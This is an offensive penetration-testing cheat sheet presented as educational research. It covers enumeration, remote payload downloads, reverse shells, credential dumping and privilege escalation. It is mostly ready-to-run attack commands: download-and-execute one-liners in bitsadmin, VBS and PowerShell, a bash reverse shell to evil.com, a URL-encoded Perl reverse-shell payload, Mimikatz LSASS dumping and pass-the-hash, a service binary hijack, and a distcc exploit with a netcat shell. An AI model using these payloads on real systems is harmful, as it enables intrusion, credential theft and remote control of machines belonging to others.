This article is for educational purposes only, I am no responsible for any damage applied wrongly by using this knowledge - it is as it is, a security research. The article does not mean to be full, but to create a scenario for security researchers, I have taken information from various resources as you will see and I have mentioned them - if I have missed something please excuse me.
0. Enumaration
netdiscover -r <network>/24
nmap -sV -T4 -O -F --version-light <ip>
nmap -sC -sS -T4 -A -v -v -Pn <ip>
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 <ip>
dirb http://<ip>
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://<ip>/FUZZ
smbclient -N -L <ip>
enum4linux -a <ip>
nikto -h <ip>
1. Download a file:
bitsadmin.exe /transfer "JobName" http://download.url/here.exe C:\destination\here.exe
bitsadmin /transfer wcb /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://download.url c:\mess.exe&start mess.exe"
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
ftp 127.0.0.1 username password get file exit
cmd.exe /c "@echo open 192.168.1.3>script.txt&@echo binary>>script.txt&@echo get /messbox.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start messbox.exe"
VB:
Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:%homepath%file", 2 ' end with
Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:%homepath%file", 2 ' end with
cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs
&@echo objXMLHTTP.open "GET","download.url/messbo
x.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH
TTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB
.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.
Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.
vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi
le "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA
DOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No
thing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vb
s&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs"
PS:
$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:%homepath%file")
powershell set-executionpolicy unrestricted
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('download.url/messbox.exe','mess.exe');Start-Process 'mess.exe'"
echo "<?php file_put_contents('28718.c', fopen('http://download.url/28718.c', 'r')); ?>" > down2.php
#!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close()
#!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }
Bash:
exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
powershell set-executionpolicy unrestricted
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('download.url/messbox.exe','mess.exe');Start-Process 'mess.exe'"
#!/usr/bin/php <?php $data = @file("http://example.com/file"); $lf = "local_file"; $fh = fopen($lf, 'w'); fwrite($fh, $data[0]); fclose($fh); ?>
echo "<?php file_put_contents('28718.c', fopen('http://download.url/28718.c', 'r')); ?>" > down2.php
#!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file");
#!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close()
#!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }
exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
References:
http://stackoverflow.com/questions/4619088/windows-batch-file-file-download-from-a-url
https://codingsec.net/2016/06/download-file-using-command-line/
https://blog.netspi.com/15-ways-to-download-a-file/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/
https://www.greyhathacker.net/?p=500
2. Get a limited shell:
h4x# ./we.py --url='http://localhost/test/cmd.php?=<rce>'
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>
By default, it assumes a GET request and uses the inline shell mode.
To specify a POST request, you pass the params and values just like a GET,
except you specify --method=post to tell the parser it is a POST injection.
For example:
h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>
Perl:
http://<ip>:8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socket::INET%28PeerAddr,%22192.168.180.132:443%22%29;STDIN-%3Efdopen%28$c,r%29;$~-%3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27
References:
https://n0where.net/common-reverse-shells/
https://github.com/infodox/web-exploitation-engine
http://insecurety.net/?tag=rce-py
https://web.archive.org/web/20160409012342/http://ptscripts.googlecode.com/svn/trunk/rce.py
https://www.exploit-db.com/papers/12871/
http://snipplr.com/view/72936/simple-php-backdoor-shell/
https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
https://nmap.org/nsedoc/scripts/http-phpmyadmin-dir-traversal.html
http://www.c7ks.xyz/index.php/archives/18/
https://www.exploit-db.com/exploits/8921/
http://www.securityfocus.com/bid/55672/exploit
https://www.exploit-db.com/exploits/25136/
2.1 Direct Exploitation (Windows):
Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026):
https://www.exploit-db.com/exploits/100/
Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039):
https://www.exploit-db.com/exploits/103/
Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039):
https://www.exploit-db.com/exploits/109/
Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049):
https://www.exploit-db.com/exploits/119/
Microsoft Windows - ASN.1 Remote Exploit (MS04-007):
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3022.tar.gz
Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011):
https://www.exploit-db.com/exploits/275/
Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011):
https://www.exploit-db.com/exploits/295/
Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031):
https://www.exploit-db.com/exploits/734/
Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)
https://www.exploit-db.com/exploits/1075/
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039):
https://www.exploit-db.com/exploits/1149/
Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040):
https://www.exploit-db.com/exploits/2223/
Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2):
https://www.exploit-db.com/exploits/2265/
Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070):
https://www.exploit-db.com/exploits/2789/
Microsoft Windows Server - Code Execution (MS08-067):
https://www.exploit-db.com/exploits/7104/
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067):
https://www.exploit-db.com/exploits/7132/
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050):
https://www.exploit-db.com/exploits/14674/
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
https://www.exploit-db.com/exploits/14607/
Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)
https://www.exploit-db.com/exploits/12273/
2.2. Direct Exploitation (Linux):
Read (carefully) the Kioptrix series, there are very nice examples.
2.3. Directory traversals:
https://pentestlab.wordpress.com/2012/06/29/directory-traversal-cheat-sheet/
https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/
https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
https://blog.techorganic.com/2012/06/21/lets-kick-shell-ish-part-1-directory-traversal-made-easy/
3.1 Attempt hashdump (Windows)
Mimikatz Commands:
logonpasswords: mimikatz # sekurlsa::logonpasswords)
Extracts passwords in memory
pth (pass the hash):
mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
A fake identity is created and the faske identitt’s NTLM hash is replaced with the real one.
“ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)”
“AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.”
ptt (pass the ticket):
mimikatz # kerberos::ptt
Enables Kerberos ticket (TGT or TGS) injection into the current session.
tickets: mimikatz # sekurlsa::tickets /export
Identifies all session Kerberos tickets and lists/exports them.
sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer.
ekeys: mimikatz # sekurlsa::ekeys
Extract the Kerberos ekeys from memory. Provides theft of a user account until the password is changed (which may be never for a Smartcard/PKI user).
dpapi: mimikatz # sekurlsa::dpapi
minidump:
mimikatz # sekurlsa::minidump lsass.dmp
Perform a minidump of the LSASS process and extract credential data from the lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can’t open the dump file from Windows 2012 on a Windows 2008 system).
kerberos:
mimikatz # sekurlsa::kerberos
Extracts the smartcad/PIV PIN from memory (cached in LSASS when using a smartcard).
debug:
mimikatz # privilege::debug
Sets debug mode for current mimikatz session enabling LSASS access.
lsadump cache: (requires token::elevate to be SYSTEM)
mimikatz # lsadump::cache
Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible SYSTEM).
Download procdump
http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Create lsass.exe from lsass.dump from step#2
procdump -accepteula -ma lsass.exe lsass.dmp
Download mimikatz from https://github.com/thomhastings/mimikatz-en
Run mimikatz
Use debug mode
privilege::debug
Switch minidump
sekurlsa::minidump lsass.dmp
List all logon, now you will see the password
sekurlsa::logonPasswords
if you don't dump the memory, you must use this method
Run mimikatz
Inject sekurlsa.dll into lsass.exe:
inject::process lsass.exe sekurlsa.dll
List all password:
@getLogonPasswords
References:
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-hash-with-mimikatz/
https://sathisharthars.wordpress.com/2014/07/09/dump-cleartext-password-with-mimikatz-using-metasploit/
https://adsecurity.org/?p=556
http://www.darkoperator.com/blog/2013/6/11/stealing-user-certificates-with-meterpreter-mimikatz-extensi.html
http://hardsec.net/mimikatz-meterpreter-extension/?lang=en
http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html
http://www.r00tsec.com/2013/06/howto-dump-password-from-lsassexe.html
Try 1:
https://github.com/shjalayeri/sysret
Tasklist
sysret -pid <explorer pid>
Try 2:
Process Injector:
http://www.tarasco.org/security/Process_Injector/
Try 3:
KiTrap0D
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip
Microsoft Windows NT/2000/XP/2003/Vista/2008/7/8 - Local Ring Exploit (EPATHOBJ):
https://www.exploit-db.com/exploits/25912/
Try 4:
NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0
http://www.securityfocus.com/bid/46136/exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0045
http://downloads.securityfocus.com/vulnerabilities/exploits/46136.c
http://cissrt.blogspot.com/2011/02/cve-2011-0045-ms-windows-xp.html
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
Service Tracing Key (MS10-059)
http://www.securityfocus.com/bid/42269/exploit
http://www.argeniss.com/research/ARGENISS-ADV-081002.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/Chimichurri.zip
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2554
Ryujin - ADF.sys priv esc - ms11-080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2005
http://www.exploit-db.com/exploits/18176
pyinstaller - http://www.pyinstaller.org/
py2exe - http://www.py2exe.org/
UAC Bypass priv esc
http://www.exploit-db.com/exploits/15609
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4398
http://www.microsoft.com/technet/security/Bulletin/MS11-011.mspx
http://www.securityfocus.com/bid/45045/info
Try 5:
c:\unattend.xml
Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=
c:\sysprep.inf
c:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini
Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...
http://www.nirsoft.net/password_recovery_tools.html
Dumping cleartext credentials with mimikatz
http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html
VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
Putty clear text proxy credentials:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]
Change the upnp service binary
http://lanmaster53.com
sc config upnphost binpath= "net user <username> /add"
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost
------------------------------------------------------------------------------------------------------
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon - sysinternals.com
http://technet.microsoft.com/en-us/sysinternals/bb545027
Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?
sysinternals tools
accesschk.exe -uwcqv *
*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access
------------------------------------------------------------------------------------------------------
References:
http://it-ovid.blogspot.bg/2012/02/windows-privilege-escalation.html
https://www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/
https://www.nightlionsecurity.com/blog/guides/2012/11/windows-7-privilege-escelation-uac-bypass-guide-with-sysret-exploit/
https://www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
http://www.top-password.com/blog/reset-windows-10-password-with-sticky-keys/
http://toshellandback.com/2015/11/24/ms-priv-esc/
find / -user root -perm -4000 -ls 2>/dev/null
Read this carefully:
http://www.doomedraven.com/2013/04/hacking-linux-part-i-privilege.html
Exploit for distcc to escalate the privilege from user daemon to root.
wget --no-check-certificate http://www.exploit-db.com/download/8572 -O exploit-8572.c
ls -l exploit-8572.c
gcc exploit-8572.c -o exploit-8572
ls -l exploit-8572*
echo '#!/bin/sh' > /tmp/run echo '/bin/netcat -e /bin/sh <our ip> 4444' >> /tmp/run ps -eaf | grep udev | grep -v grep [1] Record your PID (2709), [2] subtract 1 (2708), and [3] supply new PID to the next step. Subtract 1 from the process ID (PID) number
./exploit-8572 2708
Other exploits:
http://clshack.com/index.html%3Fp=3442.html
https://git.zx2c4.com/CVE-2012-0056/about/
https://git.zx2c4.com/CVE-2012-0056/tree/
References:
https://www.pentestpartners.com/blog/exploiting-suid-executables/
https://blog.sucuri.net/2013/05/from-a-site-compromise-to-full-root-access-symlinks-to-root-part-i.html
